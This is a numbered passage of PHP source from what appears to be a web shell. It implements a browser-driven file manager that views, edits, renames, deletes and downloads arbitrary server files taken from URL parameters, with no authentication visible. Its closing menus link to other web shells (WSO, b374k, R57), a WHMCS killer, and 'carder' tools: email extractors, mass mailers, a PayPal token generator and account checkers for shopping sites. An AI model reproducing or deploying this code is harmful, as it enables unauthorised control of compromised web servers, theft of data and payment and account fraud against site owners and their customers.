4112. echo "<form method='post'>
4113. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
4114. <input type='submit' value='Save' name='save' style='width: 500px;'>
4115. </form>";
4116. } elseif($_GET['act'] == 'rename') {
4117. if($_POST['do_rename']) {
4118. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
4119. if($rename) {
4120. $act = "<script>window.location='?dir=".$dir."';</script>";
4121. } else {
4122. $act = "<font color=red>permission denied</font>";
4123. }
4124. echo "".$act."<br>";
4125. }
4126. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4127. echo "<form method='post'>
4128. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
4129. <input type='submit' name='do_rename' value='rename'>
4130. </form>";
4131. } elseif($_GET['act'] == 'delete') {
4132. $delete = unlink($_GET['file']);
4133. if($delete) {
4134. $act = "<script>window.location='?dir=".$dir."';</script>";
4135. } else {
4136. $act = "<font color=red>permission denied</font>";
4137. }
4138. echo $act;
4139. }else {
4140. if(is_dir($dir) == true) {
4141. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
4142. <tr>
4143. <th class="th_home"><center>Name</center></th>
4144. <th class="th_home"><center>Type</center></th>
4145. <th class="th_home"><center>Size</center></th>
4146. <th class="th_home"><center>Last Modified</center></th>
4147. <th class="th_home"><center>Permission</center></th>
4148. <th class="th_home"><center>Action</center></th>
4149. </tr>';
4150. $scandir = scandir($dir);
4151. foreach($scandir as $dirx) {
4152. $dtype = filetype("$dir/$dirx");
4153. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
4154. if(!is_dir("$dir/$dirx")) continue;
4155. if($dirx === '..') {
4156. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
4157. } elseif($dirx === '.') {
4158. $href = "<a href='?dir=$dir'>$dirx</a>";
4159. } else {
4160. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
4161. }
4162. if($dirx === '.' || $dirx === '..') {
4163. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
4164. } else {
4165. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
4166. }
4167. echo "<tr>";
4168. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
4169. echo "<td class='td_home'><center>$dtype</center></td>";
4170. echo "<td class='td_home'><center>-</center></th>";
4171. echo "<td class='td_home'><center>$dtime</center></td>";
4172. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
4173. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
4174. }
4175. echo "</tr>";
4176. foreach($scandir as $file) {
4177. $ftype = filetype("$dir/$file");
4178. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
4179. $size = filesize("$dir/$file")/1024;
4180. $size = round($size,3);
4181. if($size > 1024) {
4182. $size = round($size/1024,2). 'MB';
4183. } else {
4184. $size = $size. 'KB';
4185. }
4186. if(!is_file("$dir/$file")) continue;
4187. echo "<tr>";
4188. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
4189. echo "<td class='td_home'><center>$ftype</center></td>";
4190. echo "<td class='td_home'><center>$size</center></td>";
4191. echo "<td class='td_home'><center>$ftime</center></td>";
4192. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
4193. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
4194. }
4195. echo "</tr></table>";
4196. } else {
4197. echo "<font color=red>can't open directory</font>";
4198. }
4199. }
4200. echo "<center><hr><form>
4201. <select onchange='if (this.value) window.open(this.value);'>
4202. <option selected='selected' value=''> Tools Creator </option>
4203. <option value='$ling=wso'>WSO 2.8.1</option>
4204. <option value='$ling=injection'>1n73ction v3</option>
4205. <option value='$ling=wk'>WHMCS Killer</option>
4206. <option value='$ling=adminer'>Adminer</option>
4207. <option value='$ling=b374k'>b374k Shell</option>
4208. <option value='$ling=b374k323'>b374k 3.2</option>
4209. <option value='$ling=bh'>BlackHat Shell</option>
4210. <option value='$ling=dhanus'>Dhanush Shell</option>
4211. <option value='$ling=r57'>R57 Shell</option>
4212. <option value='$ling=encodedecode'>Encode Decode</option>
4213. <option value='$ling=r57'>R57 Shell</option>
4214. </select>
4215. <select onchange='if (this.value) window.open(this.value);'>
4216. <option selected='selected' value=''> Tools Carder </option>
4217. <option value='$ling=extractor'>DB Email Extractor</option>
4218. <option value='$ling=promailerv2'>Pro Mailer V2</option>
4219. <option value='$ling=bukalapak'>BukaLapak Checker</option>
4220. <option value='$ling=tokopedia'>TokoPedia Checker</option>
4221. <option value='$ling=tokenpp'>Paypal Token Generator</option>
4222. <option value='$ling=mailer'>Mailer</option>
4223. <option value='$ling=gamestopceker'>GamesTop Checker</option>
4224. </select>
4225. <noscript><input type='submit' value='Submit'></noscript>
4226. </form></font></center>";
4227. ?>
4228. </html>